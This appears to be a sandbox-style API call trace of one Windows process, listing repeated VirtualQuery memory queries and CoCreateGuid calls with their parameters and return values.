	[0412.341] VirtualQuery (in: lpAddress=0x20b3e0, lpBuffer=0x20c2a0, dwLength=0x30 | out: lpBuffer=0x20c2a0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.341] VirtualQuery (in: lpAddress=0x20b350, lpBuffer=0x20c210, dwLength=0x30 | out: lpBuffer=0x20c210*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.342] VirtualQuery (in: lpAddress=0x20b3e0, lpBuffer=0x20c2a0, dwLength=0x30 | out: lpBuffer=0x20c2a0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.342] VirtualQuery (in: lpAddress=0x20b350, lpBuffer=0x20c210, dwLength=0x30 | out: lpBuffer=0x20c210*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.342] VirtualQuery (in: lpAddress=0x20b3e0, lpBuffer=0x20c2a0, dwLength=0x30 | out: lpBuffer=0x20c2a0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.342] VirtualQuery (in: lpAddress=0x20bdf0, lpBuffer=0x20ccb0, dwLength=0x30 | out: lpBuffer=0x20ccb0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.342] VirtualQuery (in: lpAddress=0x20bdf0, lpBuffer=0x20ccb0, dwLength=0x30 | out: lpBuffer=0x20ccb0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.343] VirtualQuery (in: lpAddress=0x20bdf0, lpBuffer=0x20ccb0, dwLength=0x30 | out: lpBuffer=0x20ccb0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.343] VirtualQuery (in: lpAddress=0x20bdf0, lpBuffer=0x20ccb0, dwLength=0x30 | out: lpBuffer=0x20ccb0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.343] VirtualQuery (in: lpAddress=0x20b4e0, lpBuffer=0x20c3a0, dwLength=0x30 | out: lpBuffer=0x20c3a0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.343] VirtualQuery (in: lpAddress=0x20b570, lpBuffer=0x20c430, dwLength=0x30 | out: lpBuffer=0x20c430*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.343] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.344] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.344] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.344] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.344] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.344] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.344] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.344] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.344] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.345] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.345] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.345] VirtualQuery (in: lpAddress=0x20b920, lpBuffer=0x20c7e0, dwLength=0x30 | out: lpBuffer=0x20c7e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.345] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.345] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.345] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.345] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.346] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x670f4c9e, Data2=0xebd7, Data3=0x45f9, Data4=([0]=0xab, [1]=0xcf, [2]=0xc9, [3]=0x71, [4]=0xe6, [5]=0xa9, [6]=0x45, [7]=0x29))) returned 0x0
	[0412.346] VirtualQuery (in: lpAddress=0x20b4e0, lpBuffer=0x20c3a0, dwLength=0x30 | out: lpBuffer=0x20c3a0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.346] VirtualQuery (in: lpAddress=0x20b570, lpBuffer=0x20c430, dwLength=0x30 | out: lpBuffer=0x20c430*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.346] VirtualQuery (in: lpAddress=0x20b790, lpBuffer=0x20c650, dwLength=0x30 | out: lpBuffer=0x20c650*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.347] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x1a1b8f0d, Data2=0x71c2, Data3=0x4509, Data4=([0]=0x9d, [1]=0x84, [2]=0xb3, [3]=0x50, [4]=0x9e, [5]=0x44, [6]=0x73, [7]=0xcd))) returned 0x0
	[0412.347] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x4c72d7f0, Data2=0xe249, Data3=0x4958, Data4=([0]=0xba, [1]=0xd7, [2]=0xd3, [3]=0x57, [4]=0x4b, [5]=0xa6, [6]=0xe3, [7]=0x4e))) returned 0x0
	[0412.347] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x848b5367, Data2=0x6a96, Data3=0x4202, Data4=([0]=0xa3, [1]=0x6d, [2]=0xfd, [3]=0x56, [4]=0xe5, [5]=0x1a, [6]=0x1a, [7]=0x1e))) returned 0x0
	[0412.347] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xd97a390a, Data2=0xdc0c, Data3=0x4f3e, Data4=([0]=0xbb, [1]=0x47, [2]=0x75, [3]=0xab, [4]=0x5b, [5]=0x5, [6]=0x74, [7]=0x1c))) returned 0x0
	[0412.347] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x48ee5410, Data2=0xe2bb, Data3=0x4b06, Data4=([0]=0xbb, [1]=0xdc, [2]=0xe4, [3]=0x1, [4]=0x28, [5]=0x57, [6]=0x91, [7]=0x2b))) returned 0x0
	[0412.348] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xcccf9edc, Data2=0x8044, Data3=0x4e26, Data4=([0]=0xad, [1]=0xa7, [2]=0xae, [3]=0xb6, [4]=0xfc, [5]=0xa9, [6]=0xc5, [7]=0xe0))) returned 0x0
	[0412.348] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x11c057ec, Data2=0xf256, Data3=0x4e91, Data4=([0]=0x97, [1]=0x2b, [2]=0x4f, [3]=0xff, [4]=0x88, [5]=0xef, [6]=0x6f, [7]=0x96))) returned 0x0
	[0412.348] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x15820aef, Data2=0xea2f, Data3=0x4f91, Data4=([0]=0xac, [1]=0xbe, [2]=0xe1, [3]=0x3b, [4]=0x85, [5]=0x76, [6]=0x31, [7]=0x86))) returned 0x0
	[0412.348] VirtualQuery (in: lpAddress=0x20b350, lpBuffer=0x20c210, dwLength=0x30 | out: lpBuffer=0x20c210*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.348] VirtualQuery (in: lpAddress=0x20b350, lpBuffer=0x20c210, dwLength=0x30 | out: lpBuffer=0x20c210*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.348] VirtualQuery (in: lpAddress=0x20b3e0, lpBuffer=0x20c2a0, dwLength=0x30 | out: lpBuffer=0x20c2a0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.348] VirtualQuery (in: lpAddress=0x20b350, lpBuffer=0x20c210, dwLength=0x30 | out: lpBuffer=0x20c210*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.349] VirtualQuery (in: lpAddress=0x20b3e0, lpBuffer=0x20c2a0, dwLength=0x30 | out: lpBuffer=0x20c2a0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.349] VirtualQuery (in: lpAddress=0x20b350, lpBuffer=0x20c210, dwLength=0x30 | out: lpBuffer=0x20c210*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.349] VirtualQuery (in: lpAddress=0x20b3e0, lpBuffer=0x20c2a0, dwLength=0x30 | out: lpBuffer=0x20c2a0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.349] VirtualQuery (in: lpAddress=0x20b350, lpBuffer=0x20c210, dwLength=0x30 | out: lpBuffer=0x20c210*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.349] VirtualQuery (in: lpAddress=0x20b3e0, lpBuffer=0x20c2a0, dwLength=0x30 | out: lpBuffer=0x20c2a0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.349] VirtualQuery (in: lpAddress=0x20b350, lpBuffer=0x20c210, dwLength=0x30 | out: lpBuffer=0x20c210*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.349] VirtualQuery (in: lpAddress=0x20b3e0, lpBuffer=0x20c2a0, dwLength=0x30 | out: lpBuffer=0x20c2a0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.350] VirtualQuery (in: lpAddress=0x20b350, lpBuffer=0x20c210, dwLength=0x30 | out: lpBuffer=0x20c210*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.350] VirtualQuery (in: lpAddress=0x20b3e0, lpBuffer=0x20c2a0, dwLength=0x30 | out: lpBuffer=0x20c2a0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.350] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.350] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.350] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.350] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.351] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.351] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.351] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.351] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x41d6f762, Data2=0x5c0, Data3=0x4521, Data4=([0]=0x83, [1]=0x3c, [2]=0x81, [3]=0x7c, [4]=0xc4, [5]=0xdc, [6]=0x98, [7]=0x53))) returned 0x0
	[0412.351] VirtualQuery (in: lpAddress=0x20bc60, lpBuffer=0x20cb20, dwLength=0x30 | out: lpBuffer=0x20cb20*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.351] VirtualQuery (in: lpAddress=0x20bc60, lpBuffer=0x20cb20, dwLength=0x30 | out: lpBuffer=0x20cb20*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.351] VirtualQuery (in: lpAddress=0x20bcf0, lpBuffer=0x20cbb0, dwLength=0x30 | out: lpBuffer=0x20cbb0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.351] VirtualQuery (in: lpAddress=0x20bc60, lpBuffer=0x20cb20, dwLength=0x30 | out: lpBuffer=0x20cb20*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.352] VirtualQuery (in: lpAddress=0x20bcf0, lpBuffer=0x20cbb0, dwLength=0x30 | out: lpBuffer=0x20cbb0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.352] VirtualQuery (in: lpAddress=0x20bc60, lpBuffer=0x20cb20, dwLength=0x30 | out: lpBuffer=0x20cb20*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.352] VirtualQuery (in: lpAddress=0x20bcf0, lpBuffer=0x20cbb0, dwLength=0x30 | out: lpBuffer=0x20cbb0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.352] VirtualQuery (in: lpAddress=0x20bc60, lpBuffer=0x20cb20, dwLength=0x30 | out: lpBuffer=0x20cb20*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.352] VirtualQuery (in: lpAddress=0x20bcf0, lpBuffer=0x20cbb0, dwLength=0x30 | out: lpBuffer=0x20cbb0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.352] VirtualQuery (in: lpAddress=0x20bc60, lpBuffer=0x20cb20, dwLength=0x30 | out: lpBuffer=0x20cb20*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.352] VirtualQuery (in: lpAddress=0x20bcf0, lpBuffer=0x20cbb0, dwLength=0x30 | out: lpBuffer=0x20cbb0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.353] VirtualQuery (in: lpAddress=0x20bc60, lpBuffer=0x20cb20, dwLength=0x30 | out: lpBuffer=0x20cb20*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.353] VirtualQuery (in: lpAddress=0x20bcf0, lpBuffer=0x20cbb0, dwLength=0x30 | out: lpBuffer=0x20cbb0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.353] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.353] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.353] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.353] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.354] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.354] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.354] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.354] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xc41f2c29, Data2=0x614e, Data3=0x46ec, Data4=([0]=0x84, [1]=0xa8, [2]=0xd6, [3]=0x2e, [4]=0xa2, [5]=0xc9, [6]=0xe1, [7]=0xf))) returned 0x0
	[0412.354] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.354] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.354] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.355] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.355] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.355] VirtualQuery (in: lpAddress=0x20bc50, lpBuffer=0x20cb10, dwLength=0x30 | out: lpBuffer=0x20cb10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.355] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
